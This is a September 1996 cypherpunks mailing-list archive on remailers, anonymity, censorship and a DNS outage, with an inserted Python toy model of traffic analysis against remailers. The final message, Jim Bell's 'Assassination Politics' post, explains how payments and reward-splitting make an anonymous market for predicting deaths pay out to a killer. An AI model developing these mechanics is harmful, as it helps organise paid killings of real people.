I suggest the following configuration: a IBM 486 PC with 16MB of : ! RAM and 28.8 modem, running qmail instead of sendmail and Linux, : : How is qmail better than sendmail? The default BSD sendmail since 8.00+ : has automated ident requests built in. It can easily be compiled without : that default option, for greater efficiency. Disable reverse-DNS too... : ! on a dedicated 28.8 PPP line. The cheapest used VGA display from : ! the nearby waste dump will work just fine. : : Hell, any monitor should work! You don't need a monitor at all. Since we're assuming that the remailer is a dedicated machine, and you'll do your real work on another computer, just plug a null modem cable into the serial ports and use a terminal program on your other computer. : ! Estimated cost: $700-1000 for the system, $50-100/month for the : ! connection, and 3 hours per day to deal with mailbombing from $500 tops. 8MB is probably okay, 16 might improve resistance to mailbombs a bit tho. You can get 486 motherboards for under $100 nowadays. Do the math: used 486 MB+CPU: $100 16MB RAM: $150 case+powersupply: $50 100MB HD: $20 HD Controller: $15 Dual 16550 Serial Card: $15 28800bps Modem: $150 ------ $500 And if you really want to run a remailer, I can sell you most of the above, and I'll even throw in a 340MB IDE HD with Linux+remailers preinstalled! (Yes, I'm serious.) 
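Tim May's remark in the message before Matthew Ghio's, that probabilistic cover traffic "just adds a layer of noise, which will disappear under a correlation analysis" while message pools avoid the source/sink correlation, can be checked on a toy model. The following is an added example, not code from any poster or remailer package; the single-remailer model, recipient names, traffic volumes and the `pool` delivery mode are assumptions made for illustration.

```python
import random
from collections import Counter

# Constructed toy model (assumption): one remailer, 20 possible recipients,
# and a watched sender who always writes to the same correspondent.
RECIPIENTS = [f"user{i}" for i in range(20)]
TRUE_CORRESPONDENT = "user7"


def remailer_round(rng, watched_sends, cover_rate, background=30, pool=False):
    """Return the delivery addresses an outside observer sees in one batch."""
    real = [rng.choice(RECIPIENTS) for _ in range(background)]
    if watched_sends:
        real.append(TRUE_CORRESPONDENT)
    # Cover traffic as proposed in the thread: each input message has a
    # `cover_rate` chance of spawning one dummy to a random address.
    dummies = [rng.choice(RECIPIENTS) for _ in real if rng.random() < cover_rate]
    out = real + dummies
    if pool:
        # Message pool: everything is posted to one widely read place
        # (a newsgroup, say), so the observer sees no per-recipient delivery.
        return ["message-pool"] * len(out)
    rng.shuffle(out)
    return out


def correlation_scores(rounds):
    """Mean deliveries per recipient in rounds where the watched sender was
    active, minus the mean in rounds where it was idle."""
    active, idle = Counter(), Counter()
    n_active = n_idle = 0
    for watched_sends, outputs in rounds:
        if watched_sends:
            n_active += 1
            active.update(outputs)
        else:
            n_idle += 1
            idle.update(outputs)
    n_active, n_idle = max(n_active, 1), max(n_idle, 1)
    return {r: active[r] / n_active - idle[r] / n_idle for r in RECIPIENTS}


def observer_guess(cover_rate, pool=False, n_rounds=4000, seed=1996, margin=0.4):
    """Simulate n_rounds batches and return the recipient that stands out,
    or None when no recipient is separated from the rest by `margin`."""
    rng = random.Random(seed)
    rounds = []
    for _ in range(n_rounds):
        watched_sends = rng.random() < 0.5
        rounds.append((watched_sends,
                       remailer_round(rng, watched_sends, cover_rate, pool=pool)))
    ranked = sorted(correlation_scores(rounds).items(),
                    key=lambda kv: kv[1], reverse=True)
    (best, s1), (_, s2) = ranked[0], ranked[1]
    return best if s1 - s2 > margin else None


if __name__ == "__main__":
    print("10% cover traffic :", observer_guess(0.10))
    print("100% cover traffic:", observer_guess(1.00))
    print("message pool      :", observer_guess(0.10, pool=True))
```

Dummies raise the variance of each round, but the watched sender's contribution to one address is a constant offset that averaging over rounds recovers; in pool mode there is no per-recipient delivery to average.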
From paul at fatmans.demon.co.uk Mon Sep 2 20:11:38 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 3 Sep 1996 11:11:38 +0800 Subject: Free Speech and List Topics Message-ID: <841692279.5129.0@fatmans.demon.co.uk>

> More disturbing to me recently has been the steady increase in subscribers > to this list who don't seem to value free speech very highly, who write of > their own nation's censorship as valiant efforts to protect citizen-units > from foreign devils, and, even more shockingly, from supposed defenders of > electronic freedom who are now talking about the need for limits on > anonymity.

I too have noticed this, but we must remember that although we are the people who see the tyranny of censorship etc. all too clearly we are in a very small minority, the majority of people do not support censorship because they have made a reasoned judgement, they either support it because they are too lazy to do anything, too shit scared of the government if they do, or they just do not take the time to understand the issues and so support the common view, there is also the case that many people "go with the majority", because they do not want to appear different, and the media has so demonized free speech and liberty advocates that to associate yourself with them now is equivalent to telling people you are a rampant sexually deprived paedophile in an anorak.

Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey"

From mech at eff.org Mon Sep 2 20:28:35 1996 From: mech at eff.org (Stanton McCandlish) Date: Tue, 3 Sep 1996 11:28:35 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com> Message-ID: <199609022106.OAA15793@eff.org>

> Therefore I would > favor allowing anonymity -- with some form of traceability only under terms > considerably stronger than what are generally required for a wiretap. [...] > Please note that this is not the same as the right to *private* > conversations and the use of encryption; this is the issue of being > accountable for what you publish in public.

A problem here is that the *same* services and capabilities that permit anonymous speech in private permit anonymous speech in public. Compromising the latter compromises the former as well.

> Anyone who seriously needs anonymity because of a repressive government is > likely to use a foreign (outside whatever jurisdiction he fears) server, so > that this is not a matter of "local" laws. The tracer would have to pass > through what I hope would be tighter hoops than we have now.

Unless chaining of remailers is made mandatory and automatic, this is unlikely to work. CoS had little difficulty getting anon.penet.fi's logs, and getting a preliminary ruling against online anonymity from the Finnish courts.
You have to have an anonymizing system that crosses a dozen or so national boundaries to make such an attack infeasible for most large organizations. You'd need a system that crossed 50 or more widely disparate jurisdictions to make it infeasible to large intelligence or law enforcement agencies, and even then you'd have to NOT have broad international agreements, such as you'd called for or it would be trivial to force all the remailers in the chain to cough up personally identifiable information. > My assumption is that there will be a wide variety of Net communities with > different rules/regulations/attitudes towards anonymity that would apply ex This is already true. > some kind of international sanctions; I think that's appropriate. That's what bugs me - if there are some kind of sanctions coming from a governmental body (I may be misinterpreting you here), that's probably enough to kill private and well as public anonymity on the Net. Incidentally, if something does happen from a governmental direction to kill online anonymity, it will probably be readily broadenable to all other media. -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist From hallam at ai.mit.edu Mon Sep 2 20:52:36 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Tue, 3 Sep 1996 11:52:36 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: <50a42c$nph@life.ai.mit.edu> Message-ID: <322B5BFD.41C6@ai.mit.edu> Timothy C. May wrote: > The point is to make clear to them that the Usenet and similar Web sites > are global in nature, not subject to censorship without a very high local > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then > Singaporans will have to choose not to carry the various newsgroups into > which *I* post such messages! If the govt. of Singapore wish to keep their people in ignorance of their corruption it is going to be harder than banning a few newsgroups. I would expect the opposition to be scanning USEnet and like fora for email addresses ending with .sg and spamming appropriately. The irony of censorship is that its rarely effective and almost always superfluous. The people of singapore are aware that their government is corrupt. They vote it back in because they expect the alternative to be at least as corrupt. Its much like the US where there is a choice between the rightwing authoritarian Republican Party and the authoritarian, rightwing Democrats. > (This was done by many of us during the Karla Homulka and Teale trial in > Canada a couple of years ago: Canada imposed press restrictions on > discussion of the trial and the grisly evidence...and then was chagrinned > to find that the global Net did not adhere to their notions of what should > and could be discussed. They even seized copies of "Wired" at the border, > very much akin to Singapore's stone age policies.) There is a big difference between the Canada situation and the Singapore situation. In Canada the restrictions are temporary and stem from making the right to a fair trial a higher priority than the right to free speech. It is a conflict of two competing individual liberties. 
No observer of the OJ Simpson trial could state that the media coverage did not affect the outcome. The arguments that Mill advances for freedom of speech in On Liberty do not apply in the context of a temporary judicial injunction, they are utilitarian (suprise) and applying his general principle of "interests" would favour the temporary restriction. The situation in Sigapore is simply a corrupt government trying to supress legitimate democratic discussion. The intention is not to protect an individuals right to a fair trial, the intention is to restrict argument permanently. It is important that in an international forum people don't start imagining that their local customs are universally accepted as superior. The difference between Canadian and US law is a minor one and relates to different interpretations of a common principle. There is a vast gulf between the Singapore position and that of either the US or Canada. This is not simply a difference of local interpretation. Phill From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 20:57:59 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 3 Sep 1996 11:57:59 +0800 Subject: Free Speech and List Topics Message-ID: <01I90JJH1NJ49JDDSI@mbcl.rutgers.edu> From: IN%"tcmay at got.net" 2-SEP-1996 05:36:20.36 >No self-respecting Cypherpunk thinks the Antitrust Act and related acts are >worthy of enforcement. >(Think of how the technology we support will tend to allow new avenues for >price collusion, interlocking directorates, new forms of business combines, >unreadable secure communications with foreign competitors, and so on, all >things the Antitrust regulators are already growing worried about.) There's a difference between thinking something shouldn't be enforced (e.g., drug laws for adults) and thinking that other things - such as privacy and free speech - are more important than fully effective enforcement of something (anti-terrorism measures, AntiTrust Act, etcetera). 
I don't think that transparent houses, as Perry put it, should be required to prevent murders - but I don't approve of murders either. It's a problem with means, not ends. -Allen

From paul at fatmans.demon.co.uk Mon Sep 2 21:04:09 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 3 Sep 1996 12:04:09 +0800 Subject: Secure anonymouse server protocol: comments please Message-ID: <841692281.5135.0@fatmans.demon.co.uk>

The following is a very sketchy plan for a secure protocol for an anonymous server which allows replies without storing a recipient database in the clear.

To send a message:

The sender first exchanges keys with the server (public key cryptography assumed), the server now has the user's key and the user the server's.

The user sends the server:
The recipient for the message
the message itself
a password previously agreed
The user's ID on the server

The server decrypts to get the above back in plaintext, then it encrypts the ID & the user's address with a random session key and stores it in the database. Notice nothing is stored in the clear.

The server now encrypts the session key with the sender's public key, and forwards it to the sender of the original message.

Now finally the server sends the message on to the intended recipient in plaintext (who must also have exchanged keys with the server) along with the ID of the sender encrypted with the server's public key.

The recipient responds with his reply, and the ID of the sender still encrypted in the server's public key.

The server stores this.

When the user (the original sender) wants to pick up his mail after a couple of days he sends the server his ID encrypted with the server's public key, the server compares this with all of the encrypted IDs in the database and when it finds a match it forwards the corresponding mail to the original sender of the first message.

That's all folks.

This system has 1 huge fault, we can encrypt a user's ID with the server's public key to see what his ID in the encrypted database is and therefore identify him, maybe we need two separate server public keys, and when IDs come in encrypted with key1 (the one it releases) it decrypts with secretkey1 then encrypts with publickey2 (the one it keeps secret) or maybe we can just hash and sign the IDs in the database? As I said it`s very sketchy, I made most of this up as I wrote it so if you must tear it to pieces please do so constructively, it could be the route to a secure system....

Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey"

From franf at hhs.net Mon Sep 2 21:11:03 1996 From: franf at hhs.net (Fran Frisina) Date: Tue, 3 Sep 1996 12:11:03 +0800 Subject: (no subject) Message-ID: <322BB272.442F@hhs.net>

desubscribe

From snow at smoke.suba.com Mon Sep 2 21:23:28 1996 From: snow at smoke.suba.com (snow) Date: Tue, 3 Sep 1996 12:23:28 +0800 Subject: Sen. Leahy's "impeccable cyberspace credentials" In-Reply-To: <19960830.170609.9758.0.patrickbc@juno.com> Message-ID:

On Sat, 31 Aug 1996, patrick b cummings wrote: > jimbell, > I agree with what you are saying but not all politicians are that bad. > You make it sound as if there are no politicians that are for freedom of the > net.

Politicians get power by restricting, not by liberating. Politicians who liberate don't get re-elected.

Petro, Christopher C.
petro at suba.com snow at smoke.suba.com

From jimbell at pacifier.com Mon Sep 2 21:25:19 1996
From: jimbell at pacifier.com (jim bell)
Date: Tue, 3 Sep 1996 12:25:19 +0800
Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
Message-ID: <199609030140.SAA24564@mail.pacifier.com>

At 11:59 PM 9/1/96 -0700, James A. Donald wrote:
>At 09:04 PM 9/1/96 -0400, Alan Horowitz wrote:
>> The Aegis ship in the Gulf was not in an exercise. It was in a war zone.
>>
>> If my memory serves, the Iranian jetliner had its squawker turned off, or
>> broken.
>
>Your memory does not serve: The computer's record of the events was:
>
>Computer tells crew: Civilian jetliner on radar.
>
>Crew expecting an attack by jetfighters, tell computer to shoot it down.
>
>Computer does not put up a bunch of dialogs saying: "Hey, I think this
>is a CIVILIAN airliner, did you get that CIVILIAN airliner, are you quite
>sure you want it shot down? Instead it just shoots it down.

Suggestion for future improvement...

C:>DEL AIRLINER.COM
Are you sure? (Y/N) _

Jim Bell
jimbell at pacifier.com

From alanh at infi.net Mon Sep 2 21:25:49 1996
From: alanh at infi.net (Alan Horowitz)
Date: Tue, 3 Sep 1996 12:25:49 +0800
Subject: desubscribe
In-Reply-To:
Message-ID:

desubscribe

From chuck at nova-net.net Mon Sep 2 21:27:52 1996
From: chuck at nova-net.net (Chuck Thompson)
Date: Tue, 3 Sep 1996 12:27:52 +0800
Subject: The Esther Dyson Flap
Message-ID: <1.5.4.32.19960903005919.0068fc70@mail.nova-net.net>

I don't quite understand the position taken by Mr. Assange and Mr. Unicorn regarding recent statements attributed to Ms. Dyson. I would appreciate some additional insight.

It appears as though they are both critical of statements (taken out of context according to Dyson) because of her position with the EFF. It appears that they both believe that she has no right to her opinion if it is contradictory to the policy of the EFF.
If such an EFF policy exists, and if Dyson is of a different opinion, the fact that she holds office in an organization with which she is not in total agreement should not count against her. In fact, it is to her credit that she has the courage to speak her mind, considering that hers is an elected position. She has something to lose by speaking her mind publicly. Mr. Unicorn remains anonymous, thereby mitigating repercussions which might otherwise accrue to him as a result of the expression of his opinion. I agree with Mr. Unicorn that the EFF should state its position unequivocally. I do not agree that officers or staff of EFF should not be allowed to disagree with that position, if in fact they do. In the case of Ms. Dyson, how can we know whether she agrees or disagrees with a non-existant policy? She has, evidently, spoken her mind. Isn't that what freedom of speech allows? Imagine, if you will, where we would be right now if all elected representatives were censured for disagreeing with stated government policy. That ability is what makes this country great - and, what you both seem to be saying you stand for. Is your position solid only if everyone agrees with you and you them? Whatever happened to "defending to the death your right to say it"? Pouncing on someone, without knowing all the facts, who is vulnerable because of their position smacks of dirty politics - it is distasteful. Why not ask for the facts from the source? Then state your opinions or make your threats about not contributing financially. In keeping with the message, you have the right to take a cheap shot. I'd just like some insight into your thinking. Regards, Chuck Thompson From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 21:31:14 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 3 Sep 1996 12:31:14 +0800 Subject: Any cypherpunk solutions to this problem? 
Message-ID: <01I90CQSB7289JDDSI@mbcl.rutgers.edu> To the degree that he's correct, how can such problems be solved while increasing privacy, security, etcetera? What sort of decentralized replacements for the current DNS system can be used, preferably with prevention of removal of DN for political reasons? -Allen From: IN%"rre at weber.ucsd.edu" 27-AUG-1996 06:03:35.07 [Maybe the next Internet myth to bust up is this stuff about the Internet being decentralized. "Designed to survive a nuclear attack", etc etc. I'm afraid it doesn't work like that. The net has little redundancy, the backbones are in the hands of a small number of large companies, and all of the detailed mechanics of getting your packets to their destination are fragile and prone to propagating errors. The high levels of service to which we've grown accustomed are due to the hard work of specific people, not to the intrinsic properties of the machinery. The net works because those people are able to do the right thing. The conditions that *let* them do the right thing may disappear next month, or the month after that. So let's forget the technological determinism and lose our complacency about the future, and instead have a little gratitude to the hackers who make it work and a little political concern for the architectural choices that are coming right up on the horizon.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. 
For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Mon, 26 Aug 1996 14:15:06 -0700 (PDT) From: risks at csl.sri.com RISKS-LIST: Risks-Forum Digest Monday 26 August 1996 Volume 18 : Issue 38 ---------------------------------------------------------------------- Date: Sat, 24 Aug 1996 08:53:31 -0700 From: stevenw at best.com (Steven Weller) Subject: DNS failure [from Matthew Dillon] The following describes DNS meltdown at my ISP the other day: all DNS services were unavailable, despite multiple servers being online. Lack of DNS assured that other working services were unavailable to everyone who didn't have IP addresses written down. Here is a technical explanation of the DNS failure, for those of you interested. First, a synopsis of how DNS works... every site on the net serves their own DNS records. Some sites serve other people's DNS records. For example, BEST serves the DNS records for best.com, best.net, and most of our customer's custom domains. No site serves more then a small fraction of the DNS records on the internet from their own database. The way DNS works is that when a domain name needs to be resolved, our DNS server (anyone's DNS server) first goes to the NIC to ask where to go to resolve the domain name. The NIC itself cannot resolve domains, it can only tell our DNS server where to go to resolve a domain. Our DNS server then goes to the specified remote site to resolve the domain name belonging to that site. The remote site replies with the answer which our DNS server (a) caches for future reference, and (b) returns to the original requester. The caching is important, because otherwise a DNS server would have to re-query the remote DNS server every time someone wanted to resolve a domain. DNS records propagate through caches. 
It is simply not possible to run a DNS system with caching turned off, it would create an impossible load on the internet. Around 4:00 a.m. yesterday, some unknown site's cache got corrupted. The corruption propagated to many (hundreds) of other sites on the internet and eventually propagated to us. This corruption hit a bug in the DNS server program that wound up corrupting the program, causing DNS to loose major records. Restarting the server in this case does not solve the problem because, due to the caching on remote sites, the corrupted record repropagates almost instantly. BEST was hit by this problem very hard due to the large number of custom domains we serve... so many DNS requests come into BEST and are made by BEST that our servers would hit the corruption out on the internet within 10 seconds of starting up. Worse, this particular corruption tended to destroy the root records (stored in memory), called SOA records, for the domains served locally. This destroyed the mail system causing mail messages to bounce rather then to simply be delayed, because the DNS server was saying 'site X does not exist' rather then timing out. It's worst possible corruption that can occur in a DNS system. -- It turns out that the last two BIND releases contain a bug that, when a corrupted record of the type that started propagating at 4:00 a.m. is received, results in the destruction of other **unassociated** records stored in memory. The particular release of BIND that we were using had been running perfectly for several *months* before this incident. It was not something recently installed. There are two fixes to the problem: (1) One can lock out those sites where the corrupted records come from, and (2) One can revert to an older release. (1) is not a good solution because, due to the nature of DNS, corruption can propagate to many sites and it would be impossible to keep up to date and lock all of them out. 
We wound up taking action #(2) and reverting to an older release of bind which, fortunately, did not have the bug that caused the problem. We had to revert to BIND 4.9.3. Unfortunately, we did not think to do this for many hours because we were all convinced that the problem was external in nature and just didn't think to try a reversion. In hind sight, that is the first thing we should have tried since we had the friggin binary for the older version sitting in our source tree. As far as DNS goes... the DNS we run is not 'bsd' or 'sgi' .. it's the *official* world-wide BIND distribution run by Paul Vixie. It is really not appropriate to run the older versions shipped with most operating systems due to massive, massive security holes. The corruption problem was unavoidable. What *was* avoidable was the long period of time that elapsed before the problem got fixed, which I take full responsibility for. We spent most of that time trying to track down where the corruption was coming from... a near impossible task. Around 6:00 p.m. scuttlebutt started propagating regarding a possible bug in the last two BIND releases at which point we instantly reverted to an earlier version, which fixed the problem, then started banging our heads against the wall for not trying it earlier. Matthew Dillon Engineering, BEST Internet Communications, Inc. ------------------------------ Date: 15 Aug 1996 (LAST-MODIFIED) From: RISKS-request at csl.sri.com Subject: Abridged info on RISKS (comp.risks) The RISKS Forum is a MODERATED digest. Its Usenet equivalent is comp.risks. => SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent) if possible and convenient for you. Or use Bitnet LISTSERV. 
Alternatively, (via majordomo) DIRECT REQUESTS to with one-line, SUBSCRIBE (or UNSUBSCRIBE) [with net address if different from FROM:] or INFO [for unabridged version of RISKS information] => The INFO file (submissions, default disclaimers, archive sites, .mil/.uk subscribers, copyright policy, PRIVACY digests, etc.) is also obtainable from http://www.CSL.sri.com/risksinfo.html ftp://www.CSL.sri.com/pub/risks.info The full info file will appear now and then in future issues. *** All contributors are assumed to have read the full info file for guidelines. *** => SUBMISSIONS: to risks at CSL.sri.com with meaningful SUBJECT: line. => ARCHIVES are available: ftp://ftp.sri.com/risks or ftp ftp.sri.comlogin anonymous[YourNetAddress]cd risks or http://catless.ncl.ac.uk/Risks/VL.IS.html [i.e., VoLume, ISsue]. The ftp.sri.com site risks directory also contains the most recent PostScript copy of PGN's comprehensive historical summary of one liners: get illustrative.PS ------------------------------ End of RISKS-FORUM Digest 18.38 ************************ From snow at smoke.suba.com Mon Sep 2 21:31:17 1996 From: snow at smoke.suba.com (snow) Date: Tue, 3 Sep 1996 12:31:17 +0800 Subject: mailing lists In-Reply-To: <19960830.205359.4758.1.patrickbc@juno.com> Message-ID: On Sat, 31 Aug 1996, patrick b cummings wrote: > If any body knows any good mailings lists please tell me. > > -P. Cummings- > Patrickbc at juno.com clueless at c2.org is pretty good. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From gimonca at skypoint.com Mon Sep 2 21:35:52 1996 From: gimonca at skypoint.com (Charles Gimon) Date: Tue, 3 Sep 1996 12:35:52 +0800 Subject: Cocktail Party Conversation... Message-ID: ...of the clueful who should know better... "Ms. Denning, I'd like to introduce Ms. Dyson. Ms. Dyson, Ms. Denning." 
*********************************************************************** Wild new Ubik salad dressing, not | gimonca at skypoint.com Italian, not French, but an entirely | Minneapolis MN USA new and different taste treat that's | http://www.skypoint.com/~gimonca waking up the world! | A lean, mean meme machine. *********************************************************************** From tcmay at got.net Mon Sep 2 21:36:31 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 12:36:31 +0800 Subject: The Earliest CP Remailer *DID* Emphasize Anonymity Message-ID: At 12:27 AM 9/3/96, Bill Stewart wrote: >At 11:05 AM 9/2/96 -0700, Tim wrote: >>No, the focus was at _least_ as much on providing anonymity as on >>protection from eavesdroppers or traffic analysts. More so, actually. >>How do I know this? Well, I was the one who did the presentation on >>Chaumian mixes at the first meeting, describing them as remailers and using >>paper envelopes-within-envelopes to illustrate the concept. >>Later that day, in the "Crypto Anarchy Game" we played to educate the > >Thanks for the history correction; I got involved with Cypherpunks about >a year after the initial meeting/game, so I'm going on other people's >comments about the intent of mixes and remailers. Out of curiousity, >did either spam or blackmail show up during the first run of the game? A full range of interesting behaviors showed up. Usually this was publicized via the "out-of-band" channel of someone yelling "Hey, I was just told to deposit $100 credits to the account of "AnonymousBanker" or else my digital pseudonym will be published." A murder-for-hire business was started, several weapons-trading schemes developed, etc. Information selling was a big market success. (Not very surprising, given that Eric and I devised the playing cards, roles to be played (banker, assassin, money launderer, freedom fighter, whistleblower, etc.), and doled out crypto-currency (Monopoly money). 
The idea was not to discover real-world lessons, of course, but to graphically demonstrate some of the technology, some of the ways crypto-anonymity would change interactions, etc.) >>And all of the early uses were explicitly to anonymize the sender, not to >>deter eavesdropping (which conventional crypto works well for, anyway). > >Keeping the sender's identity hidden from the recipient is a different >problem than keeping either of them hidden from Untrusted Third Parties. >Conventional crypto is fine for keeping message content secure from >eavedroppers, but isn't enough to prevent traffic analysis; >that requires either mixes or at least message pools or broadcasts. Yes, but my point was more that we were more concerned about building a solid foundation which would solve a larger class of problems than just straight encryption would. Remailers do this. Anonymity of sender was a dominant mode in the game, for various reasons. But anonymity of receiver was also possible (we faked message pools by pinning messages to a board and then letting them be taken down, but not letting others spend time seeing which were taken down...obviously a determined person could have seen which were removed, and by whom...). Regarding traffic analysis, at least one person (George ?) set himself up as an NSA traffic analyst and tried to deduce pseudonym/true name mappings. (We gave some people roles as "NSA," "narc," and whatnot.) I no longer recall all the details of how the game evolved, interesting behaviors seen, etc. I think someone posted a summary of his reactions to the game a few weeks afterward, circa September/October 1992. It should be in any archives that cover this period. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From enzo at ima.com Mon Sep 2 21:39:09 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Tue, 3 Sep 1996 12:39:09 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: <2.2.32.19960902124403.00ae6430@panix.com> Message-ID: I agree with what you say, and that's exactly why all this thread is out of focus. Blocking anything on the net is impossible, we know it and, I'm sure, the Singapore government knows it as well. The filtering proxies they deployed, however, allow them to show that they are "doing something" and get continued support from the socially conservative constituency; the net will route around, and life will go on. If the purpose of those measures had been political censorship, the SG government would have banned crypto or simply restricted Internet access, as they have done with mass media like satellite TV. Hovever, they on one hand know that Internet is strategic to the country's future development, and on the other hand that its use is limited to a well-educated elite not likely to fall prey of simplistic propaganda as tabloid readers would be, and that would be able to find sources of free information anyway: hence, the green light. Let's not fool ourselves: social mores are determined by economic development, which in turn is driven by technology and free markets. Political activism may sometimes help, but it's largely overrated (and in some cases it may backfire). When a government pursues free market and technological advancement, time is on freedom's side. Enzo On Mon, 2 Sep 1996, Duncan Frissell wrote: > At 07:06 AM 9/2/96 +0800, James Seng wrote: > >that). 
I have a long argument with this person, telling him that despite > >what they have done, i could still access to those stuff which they ban. > >his reasoning is "how many people can do it? 10%? 5%? That's fine with us. > >If the people really wans it, they can get it". > > The flaw with this view is that it is no harder to deploy software that > defeats Singapore's proxy than it is to establish a tcp/ip connection in the > first place. For civilians (such as myself) establishing a tcp/ip > connection is as hard or as easy as establishing an encrypted tcp/ip tunnel > to defeat government control efforts. For both these tasks, I am dependent > on software writers who know more than I do. Since the software of the Net > is written by people not governments, the governments will find it hard to > hold "free users" down to a 5% or 10% figure. The Net is nothing more than > the software that it runs on and we (not governments) write the software. > > In addition, we are not imposing our ideology on Singapore. If Singapore > changes, it will be because an encounter with the realities of the free flow > of information changes it. > > DCF > From snow at smoke.suba.com Mon Sep 2 21:41:08 1996 From: snow at smoke.suba.com (snow) Date: Tue, 3 Sep 1996 12:41:08 +0800 Subject: "Security risks" vs. "credit risks" In-Reply-To: <199609010153.UAA22411@manifold.algebra.com> Message-ID: On Sat, 31 Aug 1996, Igor Chudov @ home wrote: > Timothy C. May wrote: > > than in Marianne Smith, retired school teacher from Peoria. > > Remember, private airlines are just that: private. Surely we do not support > > laws which limit a private airline from using data it has acquired to > > decide whom to pay closer attention to. This is the essence of what > > knowledge is. > Unfortunately, most private businesses suck up to the government. It > is understandable if we note that they can be harassed by the government. 
> Airlines, for example, are under tight and rather arbitrary control of > the FAA. Nail, Hammer, Head. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From um at c2.net Mon Sep 2 21:43:34 1996 From: um at c2.net (Ulf Moeller) Date: Tue, 3 Sep 1996 12:43:34 +0800 Subject: FWD: Another try to kill democracy In-Reply-To: <322B5766.60F8C2BB@dds.nl> Message-ID: >I just got wind that the German government is planning to force german >ISP's >to shut off access to my ISP, XS4ALL, because the german magazine >'Radikal' >has a web page on xs4all. That would be which government agency? >http://www.xs4all.nl/~tank/radikal/index.htm From stewarts at ix.netcom.com Mon Sep 2 22:04:16 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 13:04:16 +0800 Subject: The Earliest CP Remailer *DID* Emphasize Anonymity Message-ID: <199609030030.RAA04862@toad.com> At 11:05 AM 9/2/96 -0700, Tim wrote: >No, the focus was at _least_ as much on providing anonymity as on >protection from eavesdroppers or traffic analysts. More so, actually. >How do I know this? Well, I was the one who did the presentation on >Chaumian mixes at the first meeting, describing them as remailers and using >paper envelopes-within-envelopes to illustrate the concept. >Later that day, in the "Crypto Anarchy Game" we played to educate the Thanks for the history correction; I got involved with Cypherpunks about a year after the initial meeting/game, so I'm going on other people's comments about the intent of mixes and remailers. Out of curiousity, did either spam or blackmail show up during the first run of the game? >And all of the early uses were explicitly to anonymize the sender, not to >deter eavesdropping (which conventional crypto works well for, anyway). Keeping the sender's identity hidden from the recipient is a different problem than keeping either of them hidden from Untrusted Third Parties. 
Conventional crypto is fine for keeping message content secure from eavedroppers, but isn't enough to prevent traffic analysis; that requires either mixes or at least message pools or broadcasts. > Kleinpaste .... Julf .... I've also been pleased by how long Julf's remailer stayed in business. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jimbell at pacifier.com Mon Sep 2 22:06:28 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 3 Sep 1996 13:06:28 +0800 Subject: Assassination Politics Question Message-ID: <199609030140.SAA24561@mail.pacifier.com> At 06:10 PM 9/2/96 -0500, correspondent wrote: >If there are more than one accurate prediction for an even, how will >CP Server will allocate the prizes? What made me think of that is >that, only in the case of famous peoples, a very smart individual >might make a prediction simply out of being smart and informed. To a first approximation, they could split the reward among the correct guessers. This is an issue that I considered in some detail a year ago, but which (surprisingly enough) hasn't been raised by others. As I pointed out in AP part 1, it is necessary to reduce "shotgun guesses" among people who simply guess a date (or many dates) and make a bet. That's why I included the system of requiring the predictor to include a payment with the prediction, in such a way that the prediction remains anonymous while the included money is always paid to the AP organization. This might initially appear to be a burden to the potential "guesser"/killer, but in fact if he understands the reason for it he'll want the system in place: It's one of the main ways to avoid the situation where multiple people make guesses for a particular person and date, and thus it would tend to ensure that the successful "guessor" is the only one to make that guess. 
